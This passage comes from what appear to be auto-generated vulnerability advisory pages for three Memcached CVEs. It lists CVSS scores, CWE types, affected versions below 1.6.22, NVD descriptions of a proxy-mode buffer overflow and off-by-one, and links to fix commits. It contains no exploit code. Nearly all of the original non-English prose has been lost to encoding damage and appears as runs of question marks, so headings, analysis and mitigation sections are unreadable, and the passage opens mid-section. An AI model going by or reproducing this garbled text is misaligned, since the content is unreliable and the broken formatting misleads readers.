??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????CWE-400?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2022-48571
https://www.cve.org/CVERecord?id=CVE-2022-48571
https://github.com/memcached/memcached/commit/6b319c8c7a29e9c353dec83dc92f01905f6c8966
https://lists.debian.org/debian-lts-announce/2023/09/msg00004.html

<hr />

Memcached ???????CVE-2023-46852?¶

??????¶

1.1 ????¶

Memcached ???????????? CVE-2023-46852 ??????????? 2026-03-22 ?????????????? HIGH?CVSS 7.5?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2023-46852
????	HIGH
CVSS ??	7.5
????	CWE-120
????	2023-10-27
????	Memcached

??????¶

2.1 ??????¶

memcached:memcached:*, < 1.6.22

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

?????????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????In Memcached before 1.6.22, a buffer overflow exists when processing multiget requests in proxy mode, if there are many spaces after the "get" substring.
??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????CWE-120?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2023-46852
https://www.cve.org/CVERecord?id=CVE-2023-46852
https://github.com/memcached/memcached/commit/76a6c363c18cfe7b6a1524ae64202ac9db330767
https://github.com/memcached/memcached/compare/1.6.21...1.6.22

<hr />

Memcached ???????CVE-2023-46853?¶

??????¶

1.1 ????¶

Memcached ???????????? CVE-2023-46853 ??????????? 2026-03-22 ?????????????? CRITICAL?CVSS 9.8?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2023-46853
????	CRITICAL
CVSS ??	9.8
????	CWE-193
????	2023-10-27
????	Memcached

??????¶

2.1 ??????¶

memcached:memcached:*, < 1.6.22

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

?????????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????In Memcached before 1.6.22, an off-by-one error exists when processing proxy requests in proxy mode, if \n is used instead of \r\n.
??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????CWE-193?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2023-46853
https://www.cve.org/CVERecord?id=CVE-2023-46853
https://github.com/memcached/memcached/commit/6987918e9a3094ec4fc8976f01f769f624d790fa
https://github.com/memcached/memcached/compare/1.6.21...1.6.22